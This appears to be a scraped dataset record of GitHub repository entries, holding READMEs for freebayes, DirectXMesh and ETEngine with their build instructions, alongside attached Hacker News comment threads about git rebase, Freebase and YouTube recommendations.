snp\"\n\n### Normalizing variant representation\n\nIf you wish to obtain a VCF that does not contain haplotype calls or complex alleles, first call with default parameters and then decompose the output with tools in vcflib, vt, vcf-tools, bcftools, GATK, or Picard.\nHere we use a tool in vcflib that normalizes the haplotype calls into pointwise SNPs and indels:\n\n freebayes ... 
| vcfallelicprimitives -kg >calls.vcf\n\nNote that this is not done by default as it makes it difficult to determine which variant calls freebayes completed.\nThe raw output faithfully describes exactly the calls that were made.\n\n### Observation qualities\n\nfreebayes estimates observation quality using several simple heuristics based\non manipulations of the phred-scaled base qualities:\n\n* For single-base observations, *mismatches* and *reference observations*: the\nun-adjusted base quality provided in the BAM alignment record.\n* For *insertions*: the mean quality of the bases inside of the putatively\ninserted sequence.\n* For *deletions*: the mean quality of the bases flanking the putatively\ndeleted sequence.\n* For *haplotypes*: the mean quality of allele observations within the\nhaplotype.\n\nBy default, both base and mapping quality are integrated into the reported site quality (QUAL in the VCF) and genotype quality (GQ, when supplying `--genotype-qualities`).\nThis integration is driven by the \"Effective Base Depth\" metric first developed in [snpTools](http://www.hgsc.bcm.edu/software/snptools), which scales observation quality by mapping quality: *P(Obs|Genotype) ~ P(MappedCorrectly(Obs))P(SequencedCorrectly(Obs))*.\nSet `--standard-gls` to use the model described in the freebayes preprint.\n\n## Stream processing\n\nfreebayes can read BAM from standard input (`--stdin`) instead of directly from\nfiles. This allows the application of any number of streaming BAM filters and\ncalibrators to its input.\n\n bam_merger.sh | streaming_filter_or_process.sh | freebayes --stdin ...\n\nThis pattern allows the adjustment of alignments without rewriting BAM files,\nwhich could be expensive depending on context and available storage. A prime\nexample of this would be graph-based realignment of reads to known variants as\nimplemented in [glia](http://github.com/ekg/glia).\n\nUsing this pattern, you can filter out reads with certain criteria using\nbamtools filter without having to modify the input BAM file. You can also use\nthe bamtools API to write your own custom filters in C++. An example filter is\n[src/bamfiltertech.cpp](http://github.com/freebayes/freebayes/blob/master/src/bamfiltertech.cpp), which could be used to filter out\ntechnologies which have characteristic errors which may frustrate certain types\nof variant detection.\n\n## INDELs\n\nIn principle, any gapped aligner which is sensitive to indels will\nproduce satisfactory input for use by freebayes. Due to potential ambiguity,\nindels are\nnot parsed when they overlap the beginning or end of alignment boundaries.\n\nWhen calling indels, it is important to homogenize the positional distribution\nof insertions and deletions in the input by using left realignment. This is\nnow done automatically by freebayes, but the behavior can be turned off via the\n`--dont-left-align-indels` flag. You probably don't want to do this.\n\nLeft realignment will place all indels in homopolymer and microsatellite\nrepeats at the same position, provided that doing so does not introduce\nmismatches between the read and reference other than the indel. This method is\ncomputationally inexpensive and handles the most common classes of alignment\ninconsistency.\n\n## Haplotype calls\n\nAs freebayes is haplotype-based, left-alignment is necessary only for the\ndetermination of candidate polymorphic loci. Once such loci are determined,\nhaplotype observations are extracted from reads where:\n\n1. 
putative variants lie within `--haplotype-length` bases of each other\n(default 3bp),\n2. the reference sequence has repeats (e.g. microsatellites or STRs are called\nas one haplotype),\n3. the haplotype which is called has Shannon entropy less than\n`--min-repeat-entropy`, which is off by default but can be set to ~1 for\noptimal genotyping of indels in lower-complexity sequence.\n\nAfter a haplotype window is determined by greedily expanding the window across\noverlapping haplotype observations, all reads overlapping the window are used\nto establish data likelihoods, *P(Observations|Genotype)*, for all haplotypes\nwhich have sufficient support to pass the input filters.\n\nPartial observations are considered to support those haplotypes which they\ncould match exactly. For expedience, only haplotypes which are contiguously\nobserved by the reads are considered as putative alleles in this process. This\ndiffers from other haplotype-based methods, such as\n[Platypus](http://www.well.ox.ac.uk/platypus), which consider all possible\nhaplotypes composed of observed component alleles (SNPs, indels) in a given\nregion when generating likelihoods.\n\nThe primary advantages of this approach are conceptual simplicity and\nperformance, and it is primarily limited in the case of short reads, an issue\nthat is mitigated by increasing read lengths. Also, a hybrid approach must be\nused to call haplotypes from high-error-rate long reads.\n\n### Re-genotyping known variants and calling long haplotypes\n\nFor longer reads with higher error rates, it is possible to generate long\nhaplotypes in two passes over the data. For instance, if we had very long\nreads (e.g. >10kb) at moderate depth and high error rate (>5%) such as might be\nproduced by PacBio, we could do something like:\n\n freebayes -f ref.fa aln.bam | vcffilter -f \"QUAL > 20\" >vars.vcf\n\n... thus generating candidate variants of suitable quality using the default\ndetection window. We can then use these as \"basis alleles\" for the observation\nof haplotypes, considering all other putative variants supported by the\nalignment to be sequencing errors:\n\n freebayes -f ref.fa --haplotype-length 500 \\\n --haplotype-basis-alleles vars.vcf aln.bam >haps.vcf\n\nThese steps should allow us to read long haplotypes directly from input data\nwith high error rates.\n\nThe high error rate means that beyond a small window each read will contain a\ncompletely different literal haplotype. 
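\nAs a reminder of what these phred-scaled figures mean numerically (a minimal sketch using the standard phred definition, Q = -10 * log10(p)):\n\n    #include <cmath>\n    #include <iostream>\n\n    // phred-scaled quality <-> error probability: Q = -10 * log10(p)\n    static double phred_to_prob(double q) { return std::pow(10.0, -q / 10.0); }\n    static double prob_to_phred(double p) { return -10.0 * std::log10(p); }\n\n    int main() {\n        // QUAL > 20 keeps sites whose probability of being non-polymorphic\n        // is below 0.01, i.e. P(polymorphism) > 0.99, as in the filter above\n        std::cout << phred_to_prob(20.0) << std::endl;  // 0.01\n        std::cout << prob_to_phred(0.01) << std::endl;  // 20\n    }\n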
Up to a point, this high per-read haplotype diversity improves our\nsignal-to-noise ratio and can effectively filter out sequencing errors at the\npoint of the input filters, but it also decreases the effective observation\ndepth, which will prevent the generation of any calls if a long `--haplotype-length`\nis combined with a high sequencing error rate.\n\n\n## Best practices and design philosophy\n\nfreebayes follows the patterns suggested by the [Unix philosophy](https://en.wikipedia.org/wiki/Unix_philosophy), which promotes the development of simple, modular systems that perform a single function, and can be combined into more complex systems using stream processing of common interchange formats.\n\nfreebayes incorporates a number of features in order to reduce the complexity of variant detection for researchers and developers:\n\n* **Indel realignment is accomplished internally** using a read-independent method, and issues resulting from discordant alignments are dramatically reduced through the direct detection of haplotypes.\n* The need for **base quality recalibration is avoided** through the direct detection of haplotypes. Sequencing platform errors tend to cluster (e.g. at the ends of reads), and generate unique, non-repeating haplotypes at a given locus.\n* **Variant quality recalibration is avoided** by incorporating a number of metrics, such as read placement bias and allele balance, directly into the Bayesian model. (Our upcoming publication will discuss this in more detail.)\n\nA minimal pre-processing pipeline similar to that described in \"Calling variants\" should be sufficient for most uses.\nFor more information, please refer to a post by Brad Chapman [on minimal BAM preprocessing methods](http://bcbio.wordpress.com/2013/10/21/updated-comparison-of-variant-detection-methods-ensemble-freebayes-and-minimal-bam-preparation-pipelines/).\n\n## Development\n\nTo download freebayes, please use git to download the most recent development tree:\n\n git clone --recursive https://github.com/freebayes/freebayes.git\n\nIf you already have a checkout, update the submodules with\n\n git submodule update --init --recursive --progress\n\nOn Debian you'll need a gcc compiler and will want these packages:\n\n- bc\n- samtools\n- parallel\n- meson\n- ninja-build\n- libvcflib-tools\n- vcftools\n\nBuild dependencies are listed in [guix.scm](./guix.scm) and\n[travis](.travis.yml). Builds have been tested with gcc 7 and clang 9.\n\n## Compilation\n\nMake sure to have dependencies installed and checkout the tree\nwith `--recursive`.\n\nFreebayes can target AMD64 and ARM64 (with Neon extensions).\n\nRecently we added the meson build system, which can be run with\n\n meson build/ --buildtype debug\n\nor, to set up with clang instead,\n\n env CXX=clang++ CC=clang CC_LD=lld meson build --buildtype debug\n\nNext, compile and test in the `build` directory\n\n cd build\n ninja\n ninja test\n\nThe freebayes binary should be in\n\n build/freebayes\n\nTests on ARM may be slow. If you get a TIMEOUT, use a multiplier,\ne.g.\n\n meson test -t 4 -C build/\n\nSee [meson.build](./meson.build) for more information.\n\n### Compile in a Guix container\n\nAfter checking out the repo with recursive submodules, create a Guix\ncontainer with all the build tools with\n\n guix shell -C -D -f guix.scm\n\nSee also [guix.scm](./guix.scm).\n", "readme_type": "markdown", "hn_comments": "Good. 
https://www.amazon.com/Triumph-City-Greatest-Invention-Healt...I'm suspicious of the \"fundamental law of road congestion\".I suspect what the law reflects is that freeways don't get widened until it's so overdue that the widened version is already over-capacity.If someone complained that their web server was overloaded, and they tried increasing capacity but it was still overloaded so there's no point, you might say \"was this at Friendster?\"In the comments on the submitted story, there's an interesting mention\nof using \"sameAs\" links. I don't know much about them but there's some\nmore information on them in the links below.http://sameas.org/about.phphttps://www.w3.org/wiki/WebSchemashttps://www.w3.org/wiki/WebSchemas/sameAshttp://wiki.freebase.com/wiki/DBPediaAFAIK they don't expose Freebase ids as part of image search. You can get them through their Cloud Vision APIhttps://cloud.google.com/vision/docs/concepts#label_detectio...It's cute to seeing freebase ids surfaced in all sorts of projects. It's incredible how powerful and useful that project is.Interestingly, those mids are hashes of an earlier id system, which itself sourced from (i think,) wikipedia/en titles. There's kind of an accidental archaeology happening, from the anonymous hard-work of many smart people.Actual paper is here: http://research.google.com/pubs/archive/44818.pdfi'm pretty sure the simpler answer to this is to always merge, never use a fastfoward, never rebase and to accept history as what it is instead of trying to change it to make it 'more manageable' or whatever.changing the past to make a single linear thread is just weird imo.depending on what rebaseWithoutConflictsPossible() is doing it might be helpful though - doing a rebase is an opportunity for the merging algorithms to cause subtle problems, and taking things out of the context in which they were actually made reduces the utility of the history for seeing what was done. the more people you have working on different things at once, the more likely these problems will manifest as something real. if this rebaseWithoutConflictsPossible() check is looking for any potential conflict, not just the ones the algorithms get stuck on then i can see the utility... but its still not necessary if you never rebase and never fast-forward.\"git recursive merge doesn't screwup x% of merges in some linux kernel repo\" isn't an argument for it being useful in x% of cases so much as an argument for it causing damage in (100-x)% of cases. the many options available to tweak its behaviour to make it safer should be a giveaway that the merge feature is dangerous out of the box... the difficulty of resolving conflicts and dealing with merges is usually greatly overstated. a lot of programmers seem to have 'mergephobia'... i'm pretty sure we should just suck it up and do our jobs - learn that merges aren't that hard, and spend our time thinking about more important things. :)can you do it as a git alias or a binary you can install as git-freebase?Reminds me of this (fake) interview with Linus where he points out the \"easter egg\" in git:\"Eventually you\u2019ll discover the Easter egg in Git: all meaningful operations can be expressed in terms of the rebase command. Once you figure that out it all makes sense. I thought the joke would be obvious: rebase, freebase, as in what was Linus smoking? But programmers are an earnest and humorless crowd and the gag was largely lost on them.\"http://typicalprogrammer.com/linus-torvalds-goes-off-on-linu...Um, all I see is:> Oops! 
That page can\u2019t be found.> It looks like nothing was found at this location. Maybe try a search?Where'd it go?> Traditional techniques in git are terrible at documenting conflicts.What's the reason to document rebase conflicts?The permalink is broken for me (404) but it's still listed on the blog landing page: http://ericrie.se/blog/How is this different from git-smart?How is this different from git-smart?If your branch conflicts, rebase off master (the branch you're making a pull request to). Then it will merge cleanly. There's no practical downsides to having merge commits in master, but you should never (or rarely) see merge conflict resolution commits. You should be able to rebase to a mergeable state before merge.Interesting. Basically a commit to remember a conflict when rebasing. Not entirely my cup of tea as I prefer less noise but helpful for some if conflicts generate lost work too often. I find it annoying when see commits on a PR that says \"fixing rebase conflicts\" etc. \"rebase continue\" should have inlined those changes to the relevant commit.My simpler suggestion to avoid unnecessary merges is to try to wrap an alias around merge that simple just prompts whether they tried to rebase first. If you need to merge it often smells like a branch has existed too long.The author never elaborates on why exactly he thinks this is needed. I think reading between the lines the reason is that if someone's done a merge/rebase and screwed up a conflict resolution the information about how that's happened is lost forever, so let's come up with some hack to save that information in case there was a conflict.If that's the case, a solution that would categorically lose less information would be:1. You're going to push branch you/whatever2. You rebase you/whatever on on master3. You solve whatever conflicts you have4. You make a non-fast-forward merge commit to indicate that you/whatever was rebased as a series with a name5. You push your conflict resolved & rebased you/whatever branch to master6. You push the original you/whatever as unrebased/you/whateverNow you have the original unrebased commits in your repository, you can now simply inspect your history to see what the original commits were, how they conflicted, and how those conflicts were resolved.Once branches in unrebased/* get old enough you just delete them. 
In my experience the importance of seeing how someone did something in source control is inversely proportional to how recently it was committed.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "microsoft/DirectXMesh", "link": "https://github.com/microsoft/DirectXMesh", "tags": ["microsoft", "directx", "directx-11", "directx-12", "cpp-library", "geometry-processing", "xbox", "directxmesh", "uwp", "desktop"], "stars": 655, "description": "DirectXMesh geometry processing library", "lang": "C++", "repo_lang": "", "readme": "![DirectX Logo](https://raw.githubusercontent.com/wiki/Microsoft/DirectXMesh/X_jpg.jpg)\n\n# DirectXMesh geometry processing library\n\nhttp://go.microsoft.com/fwlink/?LinkID=324981\n\nCopyright (c) Microsoft Corporation.\n\n**December 15, 2022**\n\nThis package contains DirectXMesh, a shared source library for performing various geometry content processing operations including generating normals and tangent frames, triangle adjacency computations, vertex cache optimization, and meshlet generation.\n\nThis code is designed to build with Visual Studio 2019 (16.11), Visual Studio 2022, clang for Windows v12 or later, or MinGW 12.2. Use of the Windows 10 May 2020 Update SDK ([19041](https://walbourn.github.io/windows-10-may-2020-update-sdk/)) or later is required for Visual Studio. It can also be built for Windows Subsystem for Linux using GCC 11 or later.\n\nThese components are designed to work without requiring any content from the legacy DirectX SDK. For details, see [Where is the DirectX SDK?](https://aka.ms/dxsdk).\n\n## Directory Layout\n\n* ``DirectXMesh\\``\n\n + This contains the DirectXMesh library.\n\n> The majority of the header files here are intended for implementation the library only (``DirectXMeshP.h``, ``scoped.h``, etc.). Only ``DirectXMesh.h`` and ``DirectXMesh.inl`` are meant as a 'public' headers for the library.\n\n* ``Utilities\\``\n\n + This contains helper code related to mesh processing that is not general enough to be part of the DirectXMesh library.\n * ``WaveFrontReader.h``: Contains a simple C++ class for reading mesh data from a WaveFront OBJ file.\n\n* ``Meshconvert\\``\n\n + This DirectXMesh sample is an implementation of the ``meshconvert`` command-line texture utility from the legacy DirectX SDK utilizing DirectXMesh rather than D3DX.\n\n> This tool does not support legacy ``.X`` files, but can export ``CMO``, ``SDKMESH``, and ``VBO`` files.\n\n* ``build\\``\n\n + Contains YAML files for the build pipelines along with some miscellaneous build files and scripts.\n\n## Documentation\n\nDocumentation is available on the [GitHub wiki](https://github.com/Microsoft/DirectXMesh/wiki).\n\n## Notices\n\nAll content and source code for this package are subject to the terms of the [MIT License](https://github.com/microsoft/DirectXMesh/blob/main/LICENSE).\n\nFor the latest version of DirectXMesh, bug reports, etc. please visit the project site on [GitHub](https://github.com/microsoft/DirectXMesh).\n\n## Release Notes\n\n* Starting with the June 2020 release, this library makes use of typed enum bitmask flags per the recommendation of the _C++ Standard_ section *17.5.2.1.3 Bitmask types*. This is consistent with Direct3D 12's use of the ``DEFINE_ENUM_FLAG_OPERATORS`` macro. This may have *breaking change* impacts to client code:\n\n * You cannot pass the ``0`` literal as your flags value. 
Instead you must make use of the appropriate default enum value: ``CNORM_DEFAULT``, ``VALIDATE_DEFAULT``, or ``MESHLET_DEFAULT``.\n\n * Use the enum type instead of ``DWORD`` if building up flags values locally with bitmask operations. For example, ```CNORM_FLAGS flags = CNORM_DEFAULT; if (...) flags |= CNORM_WIND_CW;```\n\n* The UWP projects and the Win10 classic desktop project include configurations for the ARM64 platform. Building these requires installing the ARM64 toolset.\n\n* When using clang/LLVM for the ARM64 platform, the Windows 11 SDK ([22000](https://walbourn.github.io/windows-sdk-for-windows-11/)) or later is required.\n\n## Support\n\nFor questions, consider using [Stack Overflow](https://stackoverflow.com/questions/tagged/directxtk) with the *directxtk* tag, or the [DirectX Discord Server](https://discord.gg/directx) in the *dx12-developers* or *dx9-dx11-developers* channel.\n\nFor bug reports and feature requests, please use GitHub [issues](https://github.com/microsoft/DirectXMesh/issues) for this project.\n\n## Contributing\n\nThis project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.\n\nWhen you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.\n\n## Code of Conduct\n\nThis project has adopted the [Microsoft Open Source Code of Conduct](https://opensource.microsoft.com/codeofconduct/). For more information see the [Code of Conduct FAQ](https://opensource.microsoft.com/codeofconduct/faq/) or contact [opencode@microsoft.com](mailto:opencode@microsoft.com) with any additional questions or comments.\n\n## Trademarks\n\nThis project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow [Microsoft's Trademark & Brand Guidelines](https://www.microsoft.com/en-us/legal/intellectualproperty/trademarks/usage/general). Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos are subject to those third-party's policies.\n\n## Credits\n\nThe DirectXMesh library is the work of Chuck Walbourn, with contributions from Dr. 
Hugues Hoppe, Alex Nankervis, James Stanard, Craig Peeper, and the numerous other Microsoft engineers who developed the D3DX utility library over the years.\n\nThanks to Matt Hurliman for his contribution of the meshlet generation functions.\n\nThanks to Adrian Stone (Game Angst) for the public domain implementation of Tom Forsyth's linear-speed vertex cache optimization, and thanks to Tom Forsyth for his contribution.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Illation/ETEngine", "link": "https://github.com/Illation/ETEngine", "tags": ["game-engine", "planet-generator", "planet-renderer", "real-time-rendering", "pbr", "opengl", "resource-manager", "gtkmm", "ecs", "ecs-framework", "entity-component-system", "data-oriented-design", "game-development", "3d", "3d-game-engine", "editor", "3d-editor", "data-driven", "cpp14", "c-plus-plus"], "stars": 655, "description": "Realtime 3D Game-Engine with a focus on space sim. Written in C++ 14", "lang": "C++", "repo_lang": "", "readme": "\n\n***********************************************************************************\n\n#### Realtime 3D Graphics/Simulation/Game-Engine written in C++ 14.\n\n***********************************************************************************\n\nFocus is on ease of use, extensibility, performance and providing rendering features for planet-scale environments, enabling space games and simulations.\n\n__E.T.__ stands for \"extra terrestrial\" due to the goal for this technology to go to space one day.\n\nThis project is under active development, and while a wide range of features are implemented and the overall architecture is approaching a cohesive state, many of the planned improvements are likely to touch a large cross-section of the codebase.\nTherefore, while breaking changes are usually implemented in separate branches, the interface on the master branch changes relatively frequently.\n\n
\n\"PBR\"\n\n### Discuss it on [Discord](https://discord.gg/PZc37qPwVC)!\n\n
\n\n***********************************************************************************\n\n\n## Features:\n\n\n#### Rendering\n\n*(screenshot: PBR)*\n\nRendering is based on modern principles including Physically Based Rendering.\nThe data-driven material system allows for custom shaders and parameter inheritance through material instances (similar to UE4).\nA variety of rendering features aimed at space simulation have been implemented, such as planet terrain generation, atmospheric scattering and starfields based on real sky data.\n\n#### Modular Architecture\n\nThe project is split into multiple libraries. Low-level libraries such as core or rendering can be used independently from high-level ones such as the framework.\nMany features have interfaces and implementations, allowing overriding of functionality. If you want to implement your own renderer or support a different file system, you can do that.\n\n#### Data oriented design\nMany performance-critical sections have been programmed with aspects such as cache locality in mind.\nThe renderer uses an optimized scene structure and can operate independently from the gameplay-side scene.\nGameplay features are implemented using an archetype-based Entity Component System.\n\n#### Data Driven\nAnything that is not a behavior can be described with data. The resource manager allows for custom asset types. \nReflection of data structures allows for automated serialization and deserialization of content.\nThe work-in-progress editor will allow for easy editing and control of the workflow from content-creation tools to optimized engine formats.\n\n
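\nAs a rough illustration of the reflection idea (a toy sketch, not ETEngine's actual API): once a type's members are described as data, one generic routine can serialize any instance without hand-written per-type code. In the engine itself the member list would come from its reflection system rather than being registered by hand.\n\n    #include <functional>\n    #include <iostream>\n    #include <string>\n    #include <vector>\n\n    // Toy member registry: each entry knows its name and how to read itself\n    // from an instance, so generic code can serialize any described type.\n    template <typename T>\n    struct TypeInfo {\n        struct Member {\n            std::string name;\n            std::function<std::string(const T&)> read;\n        };\n        std::vector<Member> members;\n\n        std::string Serialize(const T& obj) const {\n            std::string out;\n            for (const auto& m : members)\n                out += m.name + '=' + m.read(obj) + ';';\n            return out;\n        }\n    };\n\n    struct Transform {\n        float x = 1.f;\n        float y = 2.f;\n    };\n\n    int main() {\n        TypeInfo<Transform> info;\n        info.members.push_back({\"x\", [](const Transform& t) { return std::to_string(t.x); }});\n        info.members.push_back({\"y\", [](const Transform& t) { return std::to_string(t.y); }});\n        std::cout << info.Serialize(Transform()) << std::endl;  // x=1.000000;y=2.000000;\n    }\n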
\n
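An archetype-based ECS, as described above, stores the components of all entities that share the same component signature in contiguous parallel arrays, so "systems" become tight loops over flat memory. A minimal C++14 sketch of that idea (hypothetical names, not ETEngine's actual API):

```cpp
// Minimal sketch of an archetype-style ECS; hypothetical names,
// not ETEngine's actual API.
#include <cstddef>
#include <cstdint>
#include <iostream>
#include <vector>

struct Position { float x, y, z; };
struct Velocity { float dx, dy, dz; };

// An archetype keeps the components of every entity with the same
// component set in parallel arrays: index i of each array belongs to
// entities[i]. Contiguous storage is what provides the cache locality
// the README refers to.
struct PosVelArchetype {
    std::vector<std::uint32_t> entities;
    std::vector<Position> positions;
    std::vector<Velocity> velocities;
};

int main() {
    PosVelArchetype arch;
    for (std::uint32_t id = 0; id < 3; ++id) {
        arch.entities.push_back(id);
        arch.positions.push_back({0.f, 0.f, 0.f});
        arch.velocities.push_back({1.f, static_cast<float>(id), 0.f});
    }

    // A "system" is just a tight loop over the archetype's arrays.
    const float dt = 0.016f;
    for (std::size_t i = 0; i < arch.entities.size(); ++i) {
        arch.positions[i].x += arch.velocities[i].dx * dt;
        arch.positions[i].y += arch.velocities[i].dy * dt;
        arch.positions[i].z += arch.velocities[i].dz * dt;
    }

    for (std::size_t i = 0; i < arch.entities.size(); ++i)
        std::cout << "entity " << arch.entities[i]
                  << " y=" << arch.positions[i].y << "\n";
    return 0;
}
```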
\n\n![](./screenshots/Editor.jpg)\n\n\n## How to build\n\nFor Visual Studio 2017:\n\n    git clone https://github.com/Illation/ETEngine\n    cd ETEngine/Projects/Demo\n    cmake -G \"Visual Studio 15 2017 Win64\" -S . -B build\n    cmake --build build --target all --config Develop\n    cmake --build build --target install\n    cmake --build build --target cook-installed-resources-EtEngineDemo\n\nFor more information (including unit tests and content cooking) check [the build documentation](doc/building.md).\n\n\n## Continuous Integration\n\nDue to an [issue](https://github.com/Illation/ETEngine/issues/17) with library dependencies, CI is currently not working. However, the project has been built outside of the automated build scripts and works just fine.\n\n## Background\n\nThis project started off in 2016 as an [OpenGL graphics framework](https://github.com/Illation/GLFramework) based on the \"Overlord Engine\" (Dx11) from the Graphics Programming course at [Howest University](https://www.digitalartsandentertainment.be/).\n\nIn parallel I was writing my graduation work on [realtime planet rendering](https://github.com/Illation/PlanetRenderer), and in 2017 I merged the two projects into this engine.\n\nSince then I have added a variety of graphics and gameplay features; however, due to the design at the time, this was becoming increasingly difficult.\n\nTherefore, starting in 2019, the main focus has been on improving the architecture with an emphasis on usability and extensibility, and the codebase has been nearly completely rewritten since.\n\n#### Approximate Changelog\n\n__0.0 :__\n * Initial OpenGL Graphics Framework implementation\n\n__0.1 :__\n * Virtual File System\n * Deferred rendering\n * Physically based rendering\n * Post processing\n * Planet rendering\n * Atmospheric scattering\n\n__0.2 :__\n * Custom math library\n * Physics and Audio integration\n * Unit testing\n * Continuous integration\n * JSON parser, GLTF\n\n__0.3 :__\n * CMake build\n * Separate core library - update system\n * Reflection; serialization / deserialization\n\n__0.4 :__\n * Resource Manager, Asset Database\n * Package file format\n * Cooker\n * Asset Pointer\n\n__0.5 :__\n * GTKmm based editor app\n * Abstract Graphics API\n * Cross-context rendering viewport - support for multiple (3D) viewports\n * Flexible editor tool windowing system\n\n__0.6 :__\n * Separated rendering / framework / runtime libraries\n * Optimized render scene with minimal graphics objects - scene renderer no longer traverses the scene graph\n * Data-driven material system\n\n__0.7 :__\n * Archetype-based Entity Component System\n * Removed previous scene graph structure; all game object behavior is expressed through components and systems\n * Scene Descriptor asset - scenes are now described in files\n * Application Runtime and Editor can share custom data assets through a common library\n\n## Third Party\n\nFor a list of third-party libraries and licenses check [HERE](Engine/third_party/README.md).\n\n## Screenshots\n\n#### Atmosphere and Planets\n\n#### Render Pipeline; Physics\n\n![](./screenshots/BulletPhysics.jpg)\n", "readme_type": "markdown", "hn_comments": "To me paying the fee for YouTube is utterly rational. I get enormous pleasure out of YouTube without commercials. I too am exceptionally frustrated with their algorithms. They have never got my taste even remotely right. I think Youtube has run its course. 
Google knows Youtube is no longer the money maker it once was, and is knowingly (either literally so, or by using algorithms they can blame and plead ignorance) pushing spicy content to get you to interact. This isn't a zero-sum game: every time you tell it \"don't recommend\" and \"not interested\", that is an interaction, too. You are on Youtube instead of some other website or service. This is the attention economy equivalent of a loss leader. If you believe Youtube no longer serves you, quit. This goes for any other service, too. It's really simple. It's the same reason ChatGPT doesn't mean the end of human creative labor. ML isn't perfect. That's it. You found a false negative. The funniest I've ever had was an audiobook of Mein Kampf appearing as my top recommendation. I think I've spoken about this here previously, but I do feel YouTube radicalised me in my early 20s. In my case though it was from the left, not the right, and back then there was no real recommendation algorithm. There were trending videos and subscriptions, but if I remember correctly the only recommended stuff was basically just related content next to videos. Personally I don't know if the current recommendation algorithm is any worse than the subscription feed. I think we humans might actually just be drawn to more extreme or \"pure\" versions of our own beliefs. At least I feel this is true for myself, as it's something I have to actively fight all the time. A good example of people being drawn to more extreme versions of their own beliefs is TV news. People who watch CNN don't watch Fox News, and people who watch Fox News don't watch CNN. This self-selection of media content serves to amplify political division and radicalise people, because most people will only watch and read what they already agree with when they have to pick the content. So I think there's an argument to be made here that, while not perfect, the YouTube recommendation algorithm might actually be better than the old way of consuming content by personal selection. And I guess, by the fact that you were recommended something you so strongly disagree with that you wrote this post, you're kind of proving what I've been thinking. This recommendation clearly didn't serve to radicalise you, but for better or worse it might have helped you understand what people you wouldn't normally interact with actually think on some subject matter. And sometimes you had the perspective, but I find that often that's not the case. So yeah, while YouTube sometimes recommends me crazy stuff, I no longer have a list of 50 far-left videos waiting for me when I open the site. And while I find what I'm recommended is still biased to my personal preferences, it's less biased than myself. It seems like the algorithm recommended you a video, and then you clicked on it and watched it, or at least read the description for it, but then you clicked don't recommend and not interested. I mean, how else did you know what this leather apron club was? You seem to have described the content of the video that was recommended as if you watched it or clicked on it or interacted with it in some positive manner. You sent a conflicting signal to YouTube by investigating the content that you don't want to be recommended, by interacting with it a whole bunch. Next time you get recommended things that you don't want to be recommended, I'm going to recommend to you to not interact with them at all. Don't click on them; don't do anything that is considered engagement. I also use YouTube a bunch and I also pay for YouTube premium. 
All of my recommends are extremely accurate, and that is because the only things that I view or consume are things that I want to view or consume. I don't click on things I disagree with or would be offended by. I don't click on shorts, because I hate that entire concept of content, and I don't click on trash content like haha funny viral videos, because I am under the complete understanding that interaction and engagement are what drive the algorithm that recommends me content. I could get totally rabbit-holed and click on this stuff that it tries to recommend me every once in a while that is slightly outside of my bubble, in order to research it and find out why it tried to recommend me this. But you know what that would do? It sends a signal to them that I clicked on the video, and then I clicked on their homepage to find out more, and then I clicked on their about page to look at other channels associated with it; maybe I clicked on a couple more videos to find out if all of their content is like this; maybe I clicked on videos on the side that are related to the video, that it thinks I would be interested in if I like the video I'm currently clicked on; and all of these are positive signals that feed the recommendation engine to give me more things that I don't want to be given. And I'll go as far as to say I wouldn't even do that in an incognito tab, or from the same IP address, or from the same computer, because it will somehow leak into my logged-in normal account. I guess I also want to put forth the idea that the negative signal that you put out by saying you don't want to be recommended something is possibly exponentially weaker to the recommendation engine than any amount of investigatory engagement that you do. You say AI a lot, and frankly this is how YouTube's recommendation engine has worked for a very long time; I think it's going to be an even longer time, and it's going to require more invasive analytics, before YouTube has the ability to pick up on the intent of a click. Because that's what this really revolves around. If a human were behind the recommendation engine and you were able to small-talk with said human during your frustration of investigating why you're being recommended something, then that human would understand to ignore this engagement. Chances are someone you link to (either following their channel or through some other metric) has engaged with that content, and so Youtube believes that you're more likely to engage with it as well, if you have overlapping interests. It may be a relationship several orders removed from you - but Youtube still counts it. > If anything, because I was so puzzled by what was happening that I looked at who this Leather fellow was, Youtube\u2019s trillion dollar \u201cAI\u201d tech stack will probably serve more and more of this stuff. So... it worked. You seem to be confused about the goals of Youtube's algorithm - it isn't to show you the content you're most interested in, per se; it's to show you the content you're more likely to add value to by engagement. That can and often does correlate to your interests, but controversy works just as well, which is why these platforms often incentivize controversy over quality. Sometimes they'll throw random stuff into your feed just to see if you'll bite. Consider deleting your view history if you haven't already. Go through your subscriptions and see who they're following. 
Absolutely do not click on more than one of someone's videos if you don't want to get flooded with their content. Their AI sucks; this is what happens when a site curates their feed instead of just using hashtags+views+popular. I've been using the pockettube addon and just add my favorite channels to groups. Now I can just watch tech, and get my favorite tech shows. Cars, Music, etc. Plus I get uncensored and time/popular feeds sort views again for each of my groups. This is 10000% better than clicking \"subscriptions\". It's sad that people are just herded like sheep on what content they consume. https://pockettube.io/ Had a similar problem, wrote some js for TamperMonkey, and now TM runs my script whenever Youtube.com/* is loaded. Youtube doesn't decide what I see, I decide that. Youtube merely offers me data that I filter. It seems taking the web into my own hands is the only solution for this; I'm sure Youtube and other sites couldn't care less about their users. It's kind of funny that this is a thing too. Sometimes, I'll get the pop culture outrage grifters recommended to me since I like to dip into the current events regarding comic books. Otherwise, I get just random junk. Recommendations to view uploaded movie clips or whatever, but nothing close to what I regularly watch. I always feel like the Youtube recommendation system is flaky. It doesn't even pick up the fact that I'm subscribed to a ton of small channels for cooking and rarely puts their content on the feed. It's wild, I swear. For what it\u2019s worth, I also have YouTube Premium and watch a lot of gun content and conservative political content on YouTube, and I don\u2019t think I\u2019ve ever been recommended any sort of explicitly anti-Semitic or neo-Nazi content. I do suspect that the recommendation algorithm for Premium is slightly different and perhaps more favorable to gun content. Pretty much all gun content is demonetized, and anything that\u2019s demonetized gets recommended less; I suspect Premium is an exception to this. Also, there may be more gun content than usual lately because SHOT Show, a trade show for the gun industry, is happening this week. > I like it so much that I pay the utterly economically irrational Youtube Premium monthly fee just to skip ads. I use uBlock Origin and haven't seen an ad on Youtube in years. [dead] Turn off your watch and search history, then install a plugin that redirects you 